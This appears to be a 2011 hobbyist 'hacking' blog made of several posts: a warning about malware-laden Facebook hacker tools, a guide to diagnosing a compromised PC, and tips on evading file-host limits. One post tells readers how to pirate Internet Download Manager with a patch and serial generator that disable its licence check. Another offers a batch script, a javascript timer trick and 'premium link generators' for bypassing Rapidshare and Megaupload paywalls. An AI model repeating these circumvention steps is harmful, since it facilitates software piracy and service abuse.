I saw a video at YouTube and it was claiming that you can hack any Facebook account using the software,whose download link was given in description, Check it below:-

Thus, I downloaded this nice piece of software for testing purpose, And then tried to scan it over some antivirus engines, So I got this result over novirusthanks:-
File Information:-
  • Report date: 2011-09-08 22:21:56 (GMT 1)
  • File name: fbhackupdate-4-3-exe
  • File size: 501760 bytes
  • MD5 Hash: 4db3a47a23620ac0fe59de38d7d142ac SHA1 Hash: 766341e789fc2eff1a7630a4aebceec292597d50
  • Detection rate: 4 on 9 (44% ) Status: INFECTED
Detections:-
  • Avast - Win32:AutoRun-CHH [Trj]
  • AVG - Avira AntiVir - ClamAV - Comodo - Heur.Suspicious
  • Emsisoft - P2P-Worm.Win32.Palevo!IK
  • F-Prot - Ikarus - P2P-Worm.Win32.Palevo
Scan report generated by NoVirusThanks.org
So, the file which I downloaded was infected by some virus already, Now I don’t know that whether the uploaded of the video knew this before or just he wanted to show a tutorial in spite of knowing the fact that it’s a scam.

Second Fact Over Google:-

I Googled for Facebook Account Hacker, and according to my own guess I got so many sites which were offering such thinks, In premium manner or else also in free case. (Note:- In both case all such things are scam, I recommend don’t fall prey to such things.) So, I opened the following search query:-
Scam 1 Facebook Fake hacker
When I opened this link to check suddenly my Eset Smart Security Alarmed me like this and it even didn’t allowed me to redirect from Google to that site:-

Third Fact Phishing Attempt:-

I was surfing over Facebook and was Googling also to find new scams related this posts, So I found a discussion in Facebook Group VIA Googling, and it was like this below:-


So, He was asking to download the software and then in step 2 login using your own Facebook account, then it surely means that all this is fake. If you will login your password and email will be sent to the creator of this application. Now I don’t know that whether this person is hacker or else he was just sharing to others.  Well, Have Happy and Safer Internet.

Saturday, 22 October 2011

Internet Download Manager 6 Build 8 | Patch + Serial

Internet Download Manager is a tool to accelerate download speed and to fetch maximum speed out of your internet connected, Many people around the globe use internet download manager as it is reliable as well as quite fast with a good interface to control downloads efficiently. I have already posted previous versions of IDM which have crack included. So, that can be used for free. Now, here is a new version of IDM which is far more better than that. I’ll tell you way that how can we use that for free. First lets, discuss that how it is better? then other download managers which are built in inside your browser.

Features Of Internet Download Manager:-

  1. According to official release notes, IDM increases download speed 500 times, and If you want to buy it then it worth's:- 24 USD
  2. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.
    Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads and then after download converge all parts together.
  3. In newer version, every separate download window has new tabs installed, where you can control the speed of every download, You can limit speed of any download as you want.
  4. It can easily download videos from YouTube and other websites which offer streaming videos.
  5. It can integrate with Mozilla Firefox, Chrome, Opera, Internet Explorer and many other popular browsers and can take downloads automatically.

Download Internet Download Manager | Patch and Serial Included:-

You can download it for free from click here to download. How to use Serial and Patch please read below Guide!

How to Use Internet Download Manager For free i-e Patching Process:-

  • Download the above given package.
  • Extract that Using WinRAR and open the extracted Folder.
  • Now, Run Setup (Installer Hackers Thirst.com). When setup finishes don’t click finish, at the last step of the setup. (Basic theme is this that IDM must not be running behind in background as it can fail the hack)
  • Again open the extracted package and open, Patch (Online Checker Killer+Serial Generator) and then hit Patch Server Check. It will patch automatically (This option won’t allow the IDM to check online that whether IDM is really purchased or its fakely registered, so, we’ll kill it) If it doesn’t patch and Browse windows opens, then go where IDM has been installed and open up IDMan.exe, Normally its located in C:\Program Files\Internet Download Manager/IDMan.exe, as it depends where you have installed it. Then patching will be done.
IDM
  • Now, as the setup of IDM is pending at the last step, open the pending setup and hit finish and let IDM Run. Open up the IDM and go to Registration Tab and enter and name, email address and in the end put the serial number which is given in Patch (Online Checker Killer+Serial Generator, as you can see in above screen shot.
  • You are done, Enjoy using it and never update this IDM otherwise Patch will not work than you have to reinstall

Check If Your Computer Is Been Hacked

Many computer users go about each day not realizing their computer was compromised by a hacker. Maybe your computer has a certain file running on it that allows hackers to access your personal information at will. Either way there are steps you can take to do some spying on your own system to make sure your computer was not hacked.

NOTE: - Before doing these steps, close all downloads and web pages and running task like ms- word, Photoshop, games ets. But stay connected to internet.

1. After closing all running task, come to desktop and Refresh screen and observe that how many times icon refreshes(blinks)..If they refreshes two or more times there is chance that you are infected with Keylogger, Trojan or virus.


2. The first method is very simple for all the people using an ADSL router. After all the internet downloads and process are closed, just check the status of Ethernet light. It should not blink at a very fast rate. It shows that packets are being transferred in and out of your computer.

But as there is no active download or internet activity so no packets should transfer. If so… you might be hacked

3. Go to run and type cmd. The command prompt will open. In the command prompt type

netstat -a

  
Click On the Image For Enlarged View
This shows the list of active internet connections, check if any unnecessary internet connection is ESTABLISHED. If so, you might be hacked

4. You notice any abnormal activity in your computer, like your computer hangs for a couple of seconds every time you switch it on or in between your tasks (if it occurs often), there is a chance that you are hacked. Often keyloggers and trojans are configured to deliver all the log information to the destination ip address/ ftp address after reqular interval of time. And when this information is being sent, the browser hangs for some time.

5. Use software’s like TCP view, it gives the list of all the connections made through TCP. This software is capable of detecting almost all the trojan/malicious connections.

6. Keep the antivirus updated and install an external firewall like comodo. If your antivirus is not updated regularly, it is as good as nothing. If you don’t update your antivirus regularly and often exchange data from other computers and download a lot of files. There is a great possibility that you are hacked.

How the other tools can assist you in diagnostics:
TCPView: Look for any suspicious running processes, if there are suspicious processes, you can right click on them and click Process Properties, if you find a suspicious process, you can also click End Process to attempt to close the program
Download


Process Explorer: This program will list all running processes and can help determine which process is the parent processes and which processes are spawned by the parent.
Download


PSTools: This program contains console command line tools that can list running processes and alternately be used to kill those processes.
Download


Filealyzer: This program can be used to view advanced information about a file (explains what a program does or is). Filealyzer adds a windows explorer shell extension that allows you to analyze a file by right clicking on the file and selecting Analyze File With Filealyzer.
Download


DameWare NT: This program is typically used to remotely administer another computers system registry. Effective for removing Root Kits.

Tuesday, 18 October 2011

8 Tricks for Unlimited Rapidshare, Megaupload Downloads Hack waiting time

Rapidshare and Megaupload are the two major file sharing website in Internet. Many users still unaware of how to download Unlimited files from this website and to Byepass waiting time..
rapidshare and megaupload unlimited downloads
1) Copy the code given below in notepad :-

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
and save it as “best4hack.bat”
Now click on this file every time you download a file from Rapidshare and Megaupload
That’s it........
Enjoy unlimited downloads from Rapidshare and Megaupload..

2) Browser Javascript tricks
  • Goto the URL that you want to download and click “free button” for  downloading.
  • You can see the timer starts running
  • Now type  javascript:alert(c=2) in your Address bar of your browser
  • Hit enter
  •  Click Ok in the popup box
That’s it..
Now you can see the downloading screen appears in the browser…
It works fine but some problem may occur in this tricks. Here i mentioned the problem and solutions
Solution to problem…
1. In case the timer didn’t stop, tyou can also assign value of C=2,3 … in the javacript alert code
 Example – javascript:alert(c=3)

If you find a warning messages like this..
rapidshare error message
Just refresh the page, your file will start downloading automatically…

3) Firefox Addons
 
Here is a 2 Addons which helps you to Byepass waiting time..
For Megaupload use this AddonMegaupload NO TIME + AUTO DOWNLOAD
For Rapidshare use  SkipScreen AddonINCREDIBLE Rapidshare and Megaupload download helper.


4) proxy websites & Software

You can use proxywebsite to download the files…
Proxy softwareDownload here 
100+ Proxy website link

5) Restart modems and clear cookies 

This is the most common way to download unlimited files. When you finish your downloads just restart your modem and clear all cookies..
And start downloading the next files…

6) IP-Hider software
 
You can also use Ip-hider or tools which will hide your Ip-address and start downloading unlimited files..
Download - IP – Hider Platinum
Clear cookies after downloading every files…

7) premium Link generator

Premium Link generator is nothing but generating Premium link without money.
cool..isn’t it ??
Eventhough you don’t have any premium accounts you can use this website or tools to download files like premium users
Rapidshare50+ Rapidshare premium link generator sites
Megaupload50+ Megaupload Premium link generator
Bonus info32 sites for Rapidshare premium link generator




8) Rapidshare Download Manager

Rapidshare download manager is a cool software which helps you to download multiple without doing any tricks.
Download link 







 



Related Posts Plugin for WordPress, Blogger...